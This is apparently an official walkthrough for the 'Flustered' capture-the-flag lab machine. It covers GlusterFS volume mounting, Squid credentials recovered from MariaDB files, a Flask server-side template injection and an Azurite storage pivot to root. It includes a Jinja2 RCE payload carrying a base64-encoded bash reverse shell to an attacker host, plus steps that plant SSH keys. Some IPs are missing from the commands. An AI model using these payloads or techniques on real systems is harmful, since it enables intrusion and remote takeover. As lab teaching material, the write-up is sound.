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24th January 2022 / Document No. D22.100.153

Prepared By: polarbearer

Machine Author(s): polarbearer

Difficulty: Medium

Classification: Official

Flustered is a medium difficulty Linux machine which showcases two different storage solutions (GlusterFS
and the Azure Storage emulator Azurite) that can be accessed at different stages in order to obtain different
levels of access to the system. First, unauthenticated mount of a GlusterFS volume allows attackers to read
Squid credentials from a database, granting access to a local HTTP server where the source code of the
main web application can be read, discovering an SSTI vulnerabilty that results in remote command
execution. World-readable SSL certificates allow access to a second GlusterFS volume that is mounted as
/home , where public keys can be planted in order to SSH in as a second user. Finally, an Azure Storage blob
contains a public SSH key for the root user.

Skills Required
MySQL / MariaDB knowledge

Skills Learned
Mounting GlusterFS volumes
Identifying and exploiting SSTI vulnerabilities
Accessing Azure Storage

ports=$(nmap -p- --min-rate=1000 -T4 | grep ^[0-9] | cut -d '/' -f 1 | tr
'\n' ',' | sed s/,$//)
nmap -p$ports -sV -sC -Pn

Nmap scan shows that OpenSSH, nginx and Squid are listening on their default ports. A few more ports,
which Nmap identified as rpcbind , are open.

Browsing to port 80 we see an empty page with a background image but no actual content.
The page title is steampunk-era.htb - Coming Soon , which means the web site is still under development.

The Squid proxy requires authentication.

curl --proxy

A quick web search reveals that 24007 and 49152 are standard Gluster ports. After installing the GlusterFS
client, we can run the following command to list the available volumes:

gluster --remote-host= volume list

Two volumes, namely vol1 and vol2 , are returned. Attempting to mount any of the volumes results in an

sudo mount -t glusterfs /mnt/

The log file ( /var/log/glusterfs/mnt.log ) shows additional information about the mount failure, which
seems to be caused by a DNS resolution error:

We add an entry to the /etc/hosts file and attempt to mount vol1 again:

echo " flustered.htb flustered" | sudo tee -a /etc/hosts

sudo mount -t glusterfs flustered:/vol1 /mnt/

This fails again, and the log file shows an SSL related error:

While unable to mount vol1 , we can instead successfully mount vol2 :

sudo mount -t glusterfs flustered:/vol2 /mnt/

The volume contains MariaDB files (more precisely, it contains what is usually found in the /var/lib/mysql

Having obtained access to MariaDB files, we are now able to read data stored in the database tables. The
mysql_upgrade_info file reveals the MariaDB version:

We can run our own MariaDB server (using the same version as above to ensure compatibility) copying data
from vol2 into /var/lib/mysql . This can be easily accomplished using Docker, enabling auth_socket
authentication to avoid entering a password:
mkdir /tmp/mysql
cp -R /mnt/* /tmp/mysql/

echo -e "[mariadb]\nplugin-load-add =" > /tmp/socket.cnf

docker run --name mariadb -v /tmp/socket.cnf:/etc/mysql/mariadb.conf.d/socket.cnf -v
/tmp/mysql:/var/lib/mysql -d mariadb:10.3.31

docker exec -ti mariadb mysql

We can now read data from the passwd table in the squid database:

A quicker way to obtain the same information without running MariaDB server would be to use the
strings command:

Either way, we have obtained a user named lance.friedman with password o>WJ5-jD<5^m3 . Using these
credentials, we can successfully authenticate to Squid:

curl --proxy http://lance.friedman:'o>WJ5-jD<5^m3'@
The proxy allows us to access the web server at, which shows the default Nginx welcome
page. This suggests that the local server listening on, which is enabled by default in
/etc/nginx/sites-enabled/default on Debian systems, has not been disabled.

We run gobuster (notice that we have to URL-encode some characters in order to get a valid userinfo ):

gobuster dir -u --proxy 'http://lance.friedman:o%3EWJ5-

jD%3C5%5Em3@' -w /usr/share/dirb/wordlists/common.txt
A directory called /app was found. Requesting it results in a 403 error:

curl --proxy http://lance.friedman:'o>WJ5-jD<5^m3'@

Searching for Python files inside the /app directory, a file named is found:

gobuster dir -q -u --proxy 'http://lance.friedman:o%3EWJ5-

jD%3C5%5Em3@' -w /usr/share/dirb/wordlists/common.txt -x py

We can read it:

curl --proxy http://lance.friedman:'o>WJ5-jD<5^m3'@

from flask import Flask, render_template_string, url_for, json, request

app = Flask(__name__)

def getsiteurl(config):
if config and "siteurl" in config:
return config["siteurl"]
return "steampunk-era.htb"

@app.route("/", methods=['GET', 'POST'])

def index_page():
# Will replace this with a proper file when the site is ready
config = request.json

template = f'''
<title>{getsiteurl(config)} - Coming Soon</title>
<body style="background-image: url('{url_for('static', filename='steampunk-
3006650_1280.webp')}');background-size: 100%;background-repeat: no-repeat;">
return render_template_string(template)

if __name__ == "__main__":

The siteurl field is parsed from a JSON object in the request body and added to the page template, which
is then rendered via render_template_string() . This makes the application vulnerable to Server-Side
Template Injection. We can verify the vulnerability by sending the {{7*7}} payload:

curl -H "Content-Type: application/json" -d '{"siteurl":"{{7*7}}"}'

It worked as expected: the payload was executed and the result ( 49 ) was returned. We turn this into a
reverse shell by using a common Jinja2 RCE payload. First we base64-encode a bash reverse shell line:

echo "/bin/bash -c 'bash -i &>/dev/tcp/ 0>&1'"|base64 -w0; echo

We open a listener on port 7777 and then send the following request:

curl -H "Content-Type: application/json" -d '{"siteurl":"{% for x in

().__class__.__base__.__subclasses__() %}{% if \"warning\" in x.__name__ %}
L2Jpbi9iYXNoIC1jICdiYXNoIC1pICY+L2Rldi90Y3AvMTAuMTAuMTQuMjIvNzc3NyAwPiYxJwo=|base64 -
d|bash\")}}{%endif%}{% endfor %}"}' http://flustered.htb

A reverse shell as www-data is received.

Lateral Movement
Running the mount command we see that the GlusterFS volume vol1 , which we were unable to mount
remotely due to SSL certificate issues, is mounted locally to the /home/jennifer directory:
As shown in the Gluster documentation, SSL key and certificates are located in the /etc/ssl directory.

All three files are world-readable (including glusterfs.key , which is not by default, meaning its
permissions were changed), so we can copy them to our local /etc/ssl directory. This allows us to mount
the vol1 volume from our attacking machine:

mkdir /mnt/jennifer
mount -t glusterfs flustered:/vol1 /mnt/jennifer

We can read the user flag in /mnt/jennifer/user.txt and put our public key in .ssh/authorized_keys
in order to get a shell as jennifer .

cat ~/.ssh/ >> /mnt/jennifer/.ssh/authorized_keys

ssh jennifer@flustered

Privilege Escalation
The /var/backups directory contains a key file which is readable by the jennifer group:

The file contains base64-encoded data:

The ip a command shows that the machine has an interface on a Docker network, with IP address
We discover a running container with IP address

We use SSH dynamic port forwarding to run nmap through proxychains:

ssh -N -D 1080 jennifer@flustered

proxychains nmap -Pn -sT -T4 -v 2>&1 | grep -v error

Open port 10000 was discovered. We make a cURL request to this port:
Searching the web for InvalidQueryParameterValue , we find out it is an error related to Azure Storage. In
fact, port 10000 is used as default port by the Azurite emulator.

To be able to interact with the Azure Storage instance, we download and install the Azure Storage Explorer
application. We use SSH local port forwarding to access the service locally:

ssh -N -L10000: jennifer@flustered

We run Storage Explorer and add a new connection to a Local Storage Emulator:

We enter jennifer as the Account name and the base64 data from /var/backups/key as the Account
Two blob containers, documents and ssh-keys , are available.

From the ssh-keys container we can download a file named root.key .

We can use this key to SSH to the system as root :

chmod 400 root.key ; ssh -i root.key root@flustered

The root flag can be found in /root/root.txt .

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